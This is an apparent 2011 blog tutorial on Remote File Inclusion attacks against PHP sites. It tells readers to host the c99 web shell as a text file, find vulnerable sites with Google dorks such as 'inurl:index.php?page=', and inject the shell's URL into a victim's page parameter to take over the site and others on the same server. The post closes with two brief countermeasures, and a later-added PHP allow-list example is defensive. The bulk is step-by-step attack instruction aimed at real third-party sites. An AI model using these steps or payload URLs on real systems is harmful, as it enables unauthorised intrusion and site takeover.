
Sunday, March 6, 2011

Remote File Inclusion (RFI) | Website Hacking

Before starting this tutorial, I would like to tell you about a piece of code called a shell. There are many shells available. Let's consider a shell known as the c99 shell. First download it from here.
Now sign up for an account on any free web hosting site, say 110mb.com. Sign in to your account, go to the File Manager, upload some files and then upload the c99 shell. Now log out and visit the URL of the shell you uploaded.

http://username.110mb.com/shell.php
You will find that you can manage all your directories and files without logging in to your account, that is, without entering your password anywhere.

Both images show the file manager: in the first I am accessing it by signing in to my account, and in the second just by accessing the shell without logging in.




I just wanted to show how deadly it can be if somebody somehow uploads this kind of shell to your server. This is where the concept of Remote File Inclusion comes into the picture.




Note: Your account might be suspended after uploading such shells.


What is Remote File Inclusion?

As is clear from the name, Remote File Inclusion means 'including a remote file'. RFI is a vulnerability found in websites that allows attackers to include a remote file on the web server. This may lead to remote code execution and complete compromise of the system.

How to perform the attack?

Step 1. Upload a shell in text format to your web hosting site. That is, copy the code of the shell, save it as a text file and upload it. Note down the complete path of your shell.
Step 2. Search for a vulnerable site using Google dorks, like
inurl:index.php?id=
inurl:index.php?page=
You can use automated tools for the same.
Step 3. Let's say you found a site like
http://www.victim.com/index.php?page=anything

Replace this URL with http://www.victim.com/index.php?page=http://yoursite.com/yourshell.txt?

Your shell may have been uploaded to the server if the victim's site is vulnerable. Now you can do anything with the victim's site, or maybe even with other sites running on the same web server, simply by accessing your shell.

Possible countermeasures:
1. Strongly validate the user's input.
2. Disable allow_url_fopen and allow_url_include in php.ini.
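
The two countermeasures above, as an added example that is not code from the original post: the page parameter is resolved through a fixed allow-list, and the script checks that allow_url_include is off. The page names, the pages/ directory and the function names are assumptions.

```php
<?php
// Added example, not from the original post. Page names, the pages/
// directory and the function names are assumptions for illustration.

// Pattern that makes index.php?page=... includable from a remote URL:
//     include $_GET['page'];

// Countermeasure 1: the parameter only selects a key from a fixed
// allow-list; the included path is never built from user input.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested): ?string
{
    // Rejects arrays (?page[]=x), URLs and any name that is not an exact key.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$requested];
}

// Countermeasure 2: php.ini should carry
//     allow_url_fopen = Off
//     allow_url_include = Off
// This check lets the application refuse to start if the second is still on.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// In the request handler (sketch of the call site):
//     $path = resolve_page($_GET['page'] ?? 'home');
//     if ($path === null) { http_response_code(404); exit; }
//     include $path;

// Constructed sample inputs, run from the CLI to show the decisions.
$samples = ['about', 'anything', 'http://example.invalid/file.txt?', ['home']];
foreach ($samples as $value) {
    $shown = json_encode($value, JSON_UNESCAPED_SLASHES);
    printf("%-38s => %s\n", $shown, resolve_page($value) ?? 'rejected');
}
printf("allow_url_include enabled: %s\n", remote_include_enabled() ? 'yes' : 'no');
```

Because the allow-list maps names to files, a rejected value never reaches include at all, so the check holds even on a server where the php.ini settings have not been changed yet.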
